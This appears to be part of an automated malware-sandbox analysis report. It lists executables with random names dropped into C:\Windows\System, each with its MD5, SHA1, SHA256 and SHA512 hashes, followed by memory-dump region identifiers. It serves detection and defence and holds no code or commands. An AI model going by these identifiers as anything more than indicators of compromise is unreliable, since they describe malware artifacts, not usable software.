SHA512 7c6caad94957361755847e74745b65155a7bb3aaedc5d6c2c5c5b468e37ba8f9083e485e16f3cfcc7e38a197d92e318b61b278268f75751219d5d2f0031071ae

C:\Windows\System\OALhLOE.exe

MD5 a303aa3772f926cb89cb64a582ce4e2e
SHA1 48c6993e364f4861dec9440184ceb3e95eab0144
SHA256 14028094bd0e6335e220e5d14ae15e7d82f8ea855e91ec126e55fd6701478fa6
SHA512 e13728c4e9e8315f9833181977b8f54ab3266b5851cce5c921b2f5d3f6150a90180d5d053c5228ea4f5fe4beb03f58aa0b76e91560e339ab141101d91b3554a5

C:\Windows\System\ywqOfnx.exe

MD5 f94f06e2790431139ddff0ae3c2194f8
SHA1 983d4f15fb8deca3bc4dd712103035cafa784b17
SHA256 ad4e04af54740701b6942f93e161ddf05d6bf66be1a1c58b2ba25a89eaffaacb
SHA512 024336b85ee9d0eb59ac9dac35ce732ea32a46ace4923bc73b6efbb3dcb9c224757cdb6490d7e61c7594684e54869509646cef2413772783c152cec0ca00faca

C:\Windows\System\oJsrytP.exe

MD5 0d438772eab62a05c20f8060efb6f289
SHA1 5970b1ba4dbfcf14fe3964621364a5b7178f9263
SHA256 3e1a381634fd85ccf7ea96a0d7b397cefcca84629d448525164eab10b4b4d7a4
SHA512 29618117c692d8690867ba7d5318320494c155797094ce5401611020082118d75229918a543a1b93598448493c80264e0f354a56c350c50bc633a9b7d93681ba

memory/3708-72-0x00007FF7EF350000-0x00007FF7EF742000-memory.dmp

memory/4804-69-0x00007FF6C7EE0000-0x00007FF6C82D2000-memory.dmp

C:\Windows\System\wpejEsJ.exe

MD5 1fc03464b4508392708a906d7de1fa4f
SHA1 fcd9ded1d2530dc53453ed5d351d0d07a7f63067
SHA256 a50e4a796cdad9db3f0299c3c18f09413751e0497567cbbd18005f3df5820db2
SHA512 db1db08bc63cbffbf757ca9dac854d3331156469dcfe447ce817a9a0eee30de7bb2caec3d8fb7c7fa02da5f81189bca0d22560b3d1c241968c0b8f8b3ee2dc5c

memory/4576-3084-0x00007FF780D10000-0x00007FF781102000-memory.dmp

memory/2364-3086-0x00007FF673480000-0x00007FF673872000-memory.dmp

memory/3444-3088-0x00007FF75DC40000-0x00007FF75E032000-memory.dmp

memory/1292-3090-0x00007FF64FEA0000-0x00007FF650292000-memory.dmp

memory/2292-3097-0x00007FF6147F0000-0x00007FF614BE2000-memory.dmp

memory/3956-3098-0x00007FF776EE0000-0x00007FF7772D2000-memory.dmp

memory/1560-3102-0x00007FF653730000-0x00007FF653B22000-memory.dmp

memory/3216-3105-0x00007FF71A480000-0x00007FF71A872000-memory.dmp

memory/3708-3108-0x00007FF7EF350000-0x00007FF7EF742000-memory.dmp

memory/2680-3107-0x00007FF64B350000-0x00007FF64B742000-memory.dmp

memory/4804-3100-0x00007FF6C7EE0000-0x00007FF6C82D2000-memory.dmp

memory/2712-3094-0x00007FF6560C0000-0x00007FF6564B2000-memory.dmp

memory/3700-3093-0x00007FF65E390000-0x00007FF65E782000-memory.dmp

memory/3040-3136-0x00007FF6C5CB0000-0x00007FF6C60A2000-memory.dmp

memory/4964-3144-0x00007FF6E8D80000-0x00007FF6E9172000-memory.dmp

memory/3200-3141-0x00007FF6D7970000-0x00007FF6D7D62000-memory.dmp

memory/4588-3138-0x00007FF70B0E0000-0x00007FF70B4D2000-memory.dmp

memory/1888-3120-0x00007FF7A44D0000-0x00007FF7A48C2000-memory.dmp

memory/2116-3119-0x00007FF7E7970000-0x00007FF7E7D62000-memory.dmp

memory/1896-3116-0x00007FF7F1AF0000-0x00007FF7F1EE2000-memory.dmp

memory/2164-3115-0x00007FF6FAB30000-0x00007FF6FAF22000-memory.dmp

memory/3204-3113-0x00007FF7916D0000-0x00007FF791AC2000-memory.dmp

memory/2788-3111-0x00007FF6ED820000-0x00007FF6EDC12000-memory.dmp

memory/540-3129-0x00007FF6C5710000-0x00007FF6C5B02000-memory.dmp